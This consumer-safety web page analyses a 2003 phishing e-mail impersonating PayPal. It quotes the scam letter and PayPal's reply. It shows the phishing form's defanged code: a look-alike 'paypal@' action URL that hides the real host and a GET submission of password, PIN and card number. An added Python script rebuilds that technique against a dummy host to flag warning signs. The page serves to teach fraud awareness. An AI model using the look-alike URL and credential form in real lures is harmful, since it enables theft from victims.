5. The PayPal Spam Scam
Spammers prey on your trust of companies with a good reputation. Check out this scam.

In May of 2003 we received a letter from PayPal requesting that we verify our account to ensure our service could continue. On the surface this seems like a reasonable request. Our comments on the letter follow it below. Some of the problems with this letter are obvious, but some are very subtle.

We have received several additional mailings since this page was produced. Each of these had different opt-out messages but otherwise they were almost identical. It took several months for the media to pick up on this:

  • This scam finally became so pervasive that PC Magazine headlined it in their July 2003 edition, Vol 22 No. 12.
  • In December 2003 we heard a radio program mention this scam, including similar letters from eBay.

In December, 2003 we received another note supposedly from PayPal. Apparently someone is reading the Web and magazine articles and listening to the radio because they have addressed many of our concerns in their latest scam. Click here to read that story.

The letter has been re-created to look approximately as we received it, complete with the PayPal logo. This process took only a few minutes using features available to every Windows user. Please remember this the next time you receive an unexpected official-looking letter! Note that the links and the form submission feature have been disabled in this simulation.

From: Paysecurity <paysecurity@paypal.com>
Date: Saturday, May 24, 2003 5:26 PM
To: < our e-mail address >
Subject: Dear PayPal Customer

This looks like an official letter from PayPal, although we have no way of knowing whether "PaySecurity" is a valid mailbox. Note that the From: address proves nothing either way: a sender can put any address in that header, just as anyone can write any return address on an envelope.

It took us only five minutes to re-create the look of this letter using PayPal's logo and the blue graphic. The Verdana font, and the shaded gray text at the bottom, further imitate PayPal's look.

It costs little, if anything, to maintain a dormant account. Dropping an inactive user means the potential loss of revenue.

No reputable financial institution will ask you to verify your private information in this manner.

There are several major problems with this form:
1. PayPal uses your e-mail account as your user ID, so PayPal already knows it.
2. Never give out your password to anyone, ever! Your user ID and password allow full access to your account.
3. PayPal should already have your credit card information on file. That information would allow someone else to make on-line purchases.
4. Your PIN is being requested. Banks will never ask you for this number.
5. Clicking "Log In" sends your private information over an unencrypted connection to a server that is not PayPal's.
The expiration date lends a sense of urgency to the request.

This notification was indeed "sent to our mailbox"; however, it was sent to a mailbox that PayPal does not have on record for us.

This is supposed to be an urgent letter to PayPal's clients, not a "newsletter or product update".



This is supposed to be a business letter to PayPal's clients. If so, why does it include an "opt out" from receiving product offerings and solicitations from Providian National Bank?


Why is this letter copyright? Why is the date 2002 when it was sent in May 2003?


This letter is asking us to send private information through an unsecured site. Mail servers and standard HTTP:// Web sites are not secure for financial transactions: the information is sent in the clear and can be captured and misused by anyone on the path between you and the server. Secure sites have an address starting with HTTPS:// (note the S), which encrypts the data in transit. Bear in mind that HTTPS only protects the connection; it does not by itself prove that the site belongs to PayPal, so check the name of the site as well.

So, how could a reputable company like PayPal make so many foolish blunders? Our guess is that they didn't. We wrote to PayPal about this letter and received the reply reproduced below. Our suspicion that this is a scam was confirmed by the second paragraph.


Thank you for bringing this incident of suspicious activity to our attention. PayPal will investigate this activity immediately and contact you further if any additional information is required. We appreciate your concern and thank you for making PayPal the most trusted online payment service.

PayPal and its representatives will NEVER ask you to reveal your password. There are NO EXCEPTIONS to this policy. If anyone claiming to work for PayPal asks for your password under any circumstances, by email or by phone, please refuse and immediately contact us via webform at https://www.paypal.com/wf/f=sa_pass.


The purpose of this letter becomes more apparent if you analyze the code for the form used in the letter. When you click the "Log In" button at the bottom of the form you will send the name and value of each of the six fields in the form. Two of those fields are shown below. Note that the ID field is a seventh, "hidden" field: you will not see it, but it will be sent nonetheless, and its fixed value goes along with every victim's submission.

<input name="full_name" type="text" size="30" maxlength="32">
<input name="ID" type="hidden" size="30" maxlength="32" value="n8h4hnew">

When you click on the "Log In" button you will send the form with the six fields you entered, plus the hidden field, to the address listed in "form action" below; it has been altered on this page so it will not function. Two details of that address matter. First, everything between "http://" and the "@" is treated by the browser as a user name for logging in to the site, not as the site's name; the host the request really goes to is the one after the "@", and the "www paypal com" at the front is only a decoy. Second, the form uses method="get", so every field, including the password, the PIN and the card number, is appended to the URL in the clear, where it is recorded in the receiving server's logs and in your own browser history. Your private information will be going to this unsecured site, where a script on the page will do something with it. The follow-up note we received from PayPal explains what is probably happening.

<form action="http://www paypal com@ superspeed port5 com/000 php" method="get">

PayPal's referral program is meant to encourage people to introduce the benefits of PayPal to their friends and family, and to people they transact with online. It is not intended to encourage spam. We apologize for this inconvenience and appreciate your report.


PayPal has a program whereby they will pay you $5 to refer a friend or associate who uses their service. It appears that for each response to this e-mail someone stands to pocket $5. Perhaps having someone steal $5 from PayPal is not important to you. Perhaps having someone have access to your credit card information, including its PIN, is!

Is this spam a scam? Our guess is that it is.
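To make the two mechanisms described above concrete (the look-alike "user@host" form action and the GET submission that puts every field into the URL), here is an added example in Python. It is not code from the original page or from PayPal. The host phish.example.net, the field names other than full_name and ID, and the field values are all constructed for illustration; the real phishing host has been defanged on this page and is deliberately not reproduced.

```python
"""Added example (not from the original page): why the form's action URL
is deceptive, and what a GET submission of the form would actually leak.

Host, field names (except full_name and ID) and values are constructed
dummies for illustration, not real credentials or a real phishing site.
"""
from urllib.parse import urlsplit, urlencode

# Constructed look-alike of the scam's form action. Everything between
# "http://" and "@" is the URL's *userinfo* part (a user name), not the
# host. The browser sends the request to whatever follows the "@".
SCAM_ACTION = "http://www.paypal.com@phish.example.net/000.php"

# The six visible fields plus the hidden referral ID, as on the page's form.
# (Values are constructed dummies.)
SUBMITTED_FIELDS = {
    "full_name": "Jane Doe",
    "email": "jane@example.com",
    "password": "hunter2",
    "card_number": "4111111111111111",
    "expiry": "05/04",
    "pin": "1234",
    "ID": "n8h4hnew",  # hidden field, value taken from the page's form source
}


def real_host(url: str) -> str:
    """Return the host a browser actually connects to for `url`.

    urlsplit() follows the URL grammar: in `scheme://userinfo@host/path`
    the part before "@" is credentials and the host is the part after it.
    """
    return urlsplit(url).hostname or ""


def userinfo(url: str) -> str:
    """Return the decoy text placed before "@" (empty if there is none)."""
    return urlsplit(url).username or ""


def get_submission_url(action: str, fields: dict) -> str:
    """Build the URL a browser would request for a form with method="get".

    Every field, including password, PIN and card number, is appended to
    the URL as a query string; it lands in server logs, proxy logs and the
    browser history in the clear.
    """
    return f"{action}?{urlencode(fields)}"


def phishing_indicators(action: str, claimed_domain: str, fields: dict) -> list:
    """Flag the things a practitioner checks on a suspicious login form."""
    parts = urlsplit(action)
    host = parts.hostname or ""
    found = []
    if parts.scheme != "https":
        found.append("form submits over plain http")
    if parts.username:
        found.append(f"decoy userinfo '{parts.username}' hides real host '{host}'")
    if host != claimed_domain and not host.endswith("." + claimed_domain):
        found.append(f"action host '{host}' is not under '{claimed_domain}'")
    if any(name.lower() in ("password", "pin") for name in fields):
        found.append("asks for password/PIN in an e-mail form")
    return found


if __name__ == "__main__":
    print("decoy user name:", userinfo(SCAM_ACTION))
    print("real host:      ", real_host(SCAM_ACTION))
    print("request a browser would send:")
    print(" ", get_submission_url(SCAM_ACTION, SUBMITTED_FIELDS))
    for indicator in phishing_indicators(SCAM_ACTION, "paypal.com", SUBMITTED_FIELDS):
        print("-", indicator)
```

Running the script prints phish.example.net as the real host and www.paypal.com as the decoy user name, then the full request URL with password, PIN and card number visible in the query string, followed by the four indicators. The same checks apply to any "verify your account" form: look at what follows the "@" in the action, whether the scheme is https, and whether the form asks for secrets a real login page would never request by e-mail.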

Beware of similar scams "from" other reputable companies, such as eBay, that ask for personal identification or that try to install software.

For example, one letter "from" Microsoft offers to update the security of your computer to the latest level. Opening the attached file runs a program that mails the letter on to the people in your address book, not to mention fouling up your computer. Microsoft (and most companies) will never send out patches as e-mail attachments. They may send you a link to their update page, but they will never send you files.


rev 01/27/13
> 03/19/06

www.Eagle-Wing.Net